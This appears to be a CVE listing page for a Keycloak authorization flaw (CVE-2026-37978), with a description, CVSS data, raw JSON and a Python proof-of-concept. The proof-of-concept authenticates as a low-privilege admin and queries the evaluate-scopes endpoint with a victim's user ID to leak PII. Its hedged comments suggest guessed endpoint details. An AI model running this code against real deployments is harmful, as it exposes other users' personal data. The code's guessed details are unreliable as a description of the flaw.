Security Vulnerability Report
CVE-2026-37978 CVSS 4.9 MEDIUM

Published: 2026-05-19 12:16:18
Last Modified: 2026-05-20 17:16:22

Description

A flaw was found in Keycloak. A low-privilege administrator with the 'view-clients' role can exploit this by invoking the 'evaluate-scopes' Admin API endpoints with an arbitrary user ID (userId) parameter. This vulnerability allows for cross-role personally identifiable information (PII) leakage, enabling unauthorized visibility into user identities and authorizations across the realm. Exploitation is possible remotely via network access to the Admin API.

CVSS Details

CVSS Score: 4.9
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Keycloak (for the specific affected versions, refer to the vendor advisory RHSA-2026:19596)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import sys

import requests

# Exploit Title: Keycloak CVE-2026-37978 POC
# Description: Leaks PII via evaluate-scopes API with arbitrary userId

# Keycloak base URL, realm, and the admin-API base for that realm.
# The token endpoint lives under /realms/{realm}/..., not under the
# /admin/realms/{realm} prefix used by the Admin API.
base_url = "http://keycloak.example.com/auth"
realm = "master"
admin_url = f"{base_url}/admin/realms/{realm}"
username = "low_priv_admin"
password = "password"
client_id = "admin-cli"

# 1. Authenticate as low-privilege admin (holds only the 'view-clients' role)
auth_url = f"{base_url}/realms/{realm}/protocol/openid-connect/token"
data = {
    "client_id": client_id,
    "username": username,
    "password": password,
    "grant_type": "password",
}
session = requests.post(auth_url, data=data)
if session.status_code != 200:
    print("Authentication failed")
    sys.exit(1)
token = session.json().get("access_token")
headers = {"Authorization": f"Bearer {token}"}

# 2. Exploit: Call evaluate-scopes with an arbitrary userId
# The vulnerability allows specifying any user ID (victim's ID)
# even if the admin only has 'view-clients' role.
client_uuid = "target-client-uuid"
arbitrary_user_id = "victim-user-uuid"  # ID of the user to impersonate/leak

# Endpoint may vary slightly based on Keycloak version, typically involves scope mapping evaluation
exploit_url = f"{admin_url}/clients/{client_uuid}/evaluate-scopes/scope-mappings"

# Passing the arbitrary userId in query parameters or body depending on specific API behavior
params = {"userId": arbitrary_user_id}
response = requests.get(exploit_url, headers=headers, params=params)

if response.status_code == 200:
    print("[+] Vulnerability Exploited Successfully!")
    print(f"[+] Leaked Data for User {arbitrary_user_id}:")
    print(response.json())
else:
    print("[-] Exploit failed or endpoint not reachable")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-37978", "sourceIdentifier": "[email protected]", "published": "2026-05-19T12:16:17.540", "lastModified": "2026-05-20T17:16:21.650", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in Keycloak. A low-privilege administrator with the 'view-clients' role can exploit this by invoking the 'evaluate-scopes' Admin API endpoints with an arbitrary user ID (userId) parameter. This vulnerability allows for cross-role personally identifiable information (PII) leakage, enabling unauthorized visibility into user identities and authorizations across the realm. Exploitation is possible remotely via network access to the Admin API."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2026:19596", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:19597", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2026-37978", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2455327", "source": "[email protected]"}]}}